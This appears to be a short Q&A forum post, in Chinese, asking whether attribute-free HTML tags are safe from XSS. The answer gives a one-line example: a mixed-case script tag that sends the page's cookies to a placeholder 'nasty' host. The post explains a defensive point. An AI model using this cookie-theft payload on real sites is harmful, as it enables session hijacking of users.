没有属性的HTML标签的XSS安全性

Ema*_*sev 0 security xss validation input

如果HTML标签没有属性,它们是否安全?

Del*_*ani 5

没有.

<ScrIPT>(new Image).src = 'http://nasty/log?s=' + document.cookie;</SCRipT>
Run Code Online (Sandbox Code Playgroud)